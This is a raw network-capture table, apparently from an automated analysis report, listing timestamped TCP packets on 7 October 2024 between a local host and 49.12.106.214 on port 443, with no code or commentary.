                                                                                                                                                                                        Oct 7, 2024 20:35:24.405956030 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405965090 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.414114952 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.414181948 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.414269924 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.414477110 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.414508104 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.030637026 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.030725956 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.031084061 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.031105042 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.032579899 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.032591105 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.703856945 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.703926086 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704016924 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704049110 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704082012 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704101086 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704128027 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704149008 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704406977 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704435110 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.741667032 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.741760015 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.741858959 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.742046118 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.742079973 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:26.383939981 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:26.384043932 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:26.384964943 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:26.384993076 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:26.386778116 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:26.386791945 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078044891 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078134060 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078310966 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078310966 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078435898 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078459024 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155009031 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155061007 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155144930 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155359983 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155376911 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795401096 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795547962 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795980930 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795995951 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797436953 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797450066 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797477007 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797487974 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.162806988 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.162846088 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.163039923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.163353920 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.163367033 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554567099 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554644108 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554676056 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554738045 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554794073 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.555840969 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.555864096 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.801531076 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.802525043 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.802980900 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.802990913 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.804819107 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.804825068 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216727018 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216784954 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216801882 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216825008 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216844082 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216850042 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216885090 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216891050 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216917992 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.216942072 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.247178078 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.247241020 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.247272015 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.247282028 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.247307062 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.247328997 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.310617924 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.310687065 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.310745955 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.310777903 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.310796976 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.310822964 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.340365887 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.340420961 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.340603113 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.340624094 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.340996027 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.377954006 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.378021002 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.378057003 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.378091097 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.378106117 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.378353119 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.402895927 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.402944088 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.403089046 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.403089046 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.403124094 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.403297901 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.420989990 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.421035051 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.421068907 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.421097994 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.421113968 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.421142101 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.435405970 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.435453892 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.435488939 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.435498953 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.435524940 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.435543060 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.452400923 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.452446938 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.452495098 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.452502966 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.452661037 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.452661037 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.472985983 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.473031044 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.473064899 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.473076105 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.473102093 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.473113060 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.482923031 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.482966900 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.483005047 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.483011961 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.483043909 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.483053923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.498428106 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.498475075 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.498522043 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.498560905 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.498579979 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.498739958 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.510273933 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.510314941 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.510358095 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.510390043 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.510409117 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.511956930 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.518992901 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.519041061 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.519082069 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.519104004 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.519124031 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.519154072 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.529076099 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.529119015 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.529155016 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.529165983 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.529196978 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.529217958 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.535996914 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.536037922 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.536076069 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.536083937 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.536111116 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.536120892 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.544681072 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.544760942 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.544781923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.544790983 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.544802904 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.544832945 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.559474945 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.559506893 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.559552908 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.559583902 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.559598923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.559732914 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.569672108 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.569742918 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.569780111 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.569787979 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.569806099 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.569827080 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.584898949 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.584944010 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.585002899 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.585011005 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.585048914 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.595189095 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.595312119 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.595717907 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.595829010 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.605679035 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.605726957 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.605768919 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.605782986 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.605798960 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.605853081 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.615315914 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.615376949 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.615417957 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.615439892 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.615453005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.615642071 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.622673988 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.622721910 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.622776031 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.622791052 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.622809887 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.622848988 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.631366968 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.631431103 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.631457090 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.631472111 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.631519079 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.631519079 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.646291018 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.646346092 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.646437883 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.646437883 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.646452904 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.646631002 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.656549931 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.656605959 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.656706095 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.656706095 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.656729937 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.656778097 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.677813053 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.677875042 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.677915096 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.677927017 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.677957058 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.678000927 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.687334061 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.687402964 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.687416077 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.687426090 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.687457085 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.687479019 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.692344904 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.692388058 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.692430019 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.692445040 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.692480087 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.692480087 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701643944 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701687098 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701723099 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701740980 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701764107 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701764107 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.701787949 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.709083080 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.709141970 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.709163904 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.709182978 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.709197998 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.709276915 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.718163967 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.718214035 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.718252897 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.718274117 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.718288898 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.718384027 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.732779026 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.732837915 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.732862949 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.732886076 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.732917070 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.732939005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.743624926 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.743671894 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.743743896 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.743743896 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.743760109 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.743932962 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:29.766702890 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.766733885 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:29.766793013 CEST49810443192.168.2.549.12.106.214
